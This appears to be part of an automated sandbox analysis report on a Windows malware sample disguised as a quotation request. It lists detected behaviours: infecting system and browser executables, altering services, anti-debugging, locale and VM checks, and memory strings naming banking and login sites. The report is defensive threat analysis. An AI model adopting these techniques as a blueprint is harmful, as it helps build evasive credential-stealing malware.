Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9817Ah; ret	0_2_00B9808B
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B982E5h; ret	0_2_00B980D9
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9826Ah; ret	0_2_00B9819E
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9849Ch; ret	0_2_00B981E4
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98321h; ret	0_2_00B982E0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B97FBFh; ret	0_2_00B9831F
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B97FA8h; ret	0_2_00B9834C
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B984BAh; ret	0_2_00B983E2
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98426h; ret	0_2_00B984D8
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98075h; ret	0_2_00B984FD
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9808Ch; ret	0_2_00B98512
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98B6Fh; ret	0_2_00B98596
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98E94h; ret	0_2_00B985C9
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9878Bh; ret	0_2_00B98734
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98D45h; ret	0_2_00B987D3
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98E5Fh; ret	0_2_00B9885F
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98AB5h; ret	0_2_00B98B13
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98784h; ret	0_2_00B98CA1
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98DC9h; ret	0_2_00B98E1C
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98D14h; ret	0_2_00B98E2E

Source: RFQ _ Virtue 054451000085.exe	Static PE information: section name: .reloc entropy: 7.938034859964451
Source: elevation_service.exe.0.dr	Static PE information: section name: .reloc entropy: 7.9475115066872
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.943019776984643
Source: FXSSVC.exe.0.dr	Static PE information: section name: .reloc entropy: 7.9492983380780915
Source: elevation_service.exe0.0.dr	Static PE information: section name: .reloc entropy: 7.9507991436689505

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\AppVClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to dropped file

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00B9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B9CBD0

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to behave differently if execute on a Russian/Kazak computer

Source: C:\Windows\System32\AppVClient.exe	Code function: 7_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		7_2_00B652A0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Code function: 11_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h]		11_2_00CD52A0

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	API/Special instruction interceptor: Address: E815D4
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\choice.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_03A7096E rdtsc

10_2_03A7096E

Source: C:\Windows\SysWOW64\choice.exe	Window / User API: threadDelayed 4170			Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Window / User API: threadDelayed 5800			Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe	Jump to dropped file

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\AppVClient.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	API coverage: 4.9 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe TID: 6792	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe TID: 6820	Thread sleep count: 4170 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe TID: 6820	Thread sleep time: -8340000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe TID: 6820	Thread sleep count: 5800 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe TID: 6820	Thread sleep time: -11600000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\choice.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\choice.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: G109m407.16.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: G109m407.16.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: G109m407.16.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: AppVClient.exe, 00000007.00000002.1515587138.0000000000136000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1514767377.0000000000110000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1514968566.0000000000117000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1515114498.000000000012E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
Source: G109m407.16.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: G109m407.16.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: G109m407.16.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: choice.exe, 00000010.00000002.2744008676.0000000002675000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: iavbXasnTxCeiF.exe, 00000011.00000002.2750124223.0000000000FE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
Source: firefox.exe, 00000013.00000002.2287269038.000000000347C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
Source: G109m407.16.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: G109m407.16.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: G109m407.16.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: G109m407.16.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: G109m407.16.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe"
Source: G109m407.16.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: G109m407.16.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: G109m407.16.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: G109m407.16.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: G109m407.16.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: G109m407.16.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: G109m407.16.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

API call chain: ExitProcess graph end node

graph_0-109749

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_03A7096E rdtsc

10_2_03A7096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 10_2_00417D33 LdrLoadDll,

10_2_00417D33

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00576594 mov eax, dword ptr fs:[00000030h]	0_2_00576594
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B71130 mov eax, dword ptr fs:[00000030h]	0_2_00B71130
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00BB3F3D mov eax, dword ptr fs:[00000030h]	0_2_00BB3F3D
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00E801F0 mov eax, dword ptr fs:[00000030h]	0_2_00E801F0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00E818A0 mov eax, dword ptr fs:[00000030h]	0_2_00E818A0
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00E81840 mov eax, dword ptr fs:[00000030h]	0_2_00E81840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]	10_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]	10_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]	10_2_03A2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5438F mov eax, dword ptr fs:[00000030h]	10_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A5438F mov eax, dword ptr fs:[00000030h]	10_2_03A5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]	10_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]	10_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]	10_2_03A28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]	10_2_03A403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	10_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	10_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]	10_2_03A4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A663FF mov eax, dword ptr fs:[00000030h]	10_2_03A663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AEC3CD mov eax, dword ptr fs:[00000030h]	10_2_03AEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]	10_2_03A3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]	10_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]	10_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]	10_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]	10_2_03A383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AB63C0 mov eax, dword ptr fs:[00000030h]	10_2_03AB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	10_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03AD43D4 mov eax, dword ptr fs:[00000030h]	10_2_03AD43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]	10_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]	10_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]	10_2_03A6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A2C310 mov ecx, dword ptr fs:[00000030h]	10_2_03A2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 10_2_03A50310 mov ecx, dword ptr fs:[00000030h]	10_2_03A50310
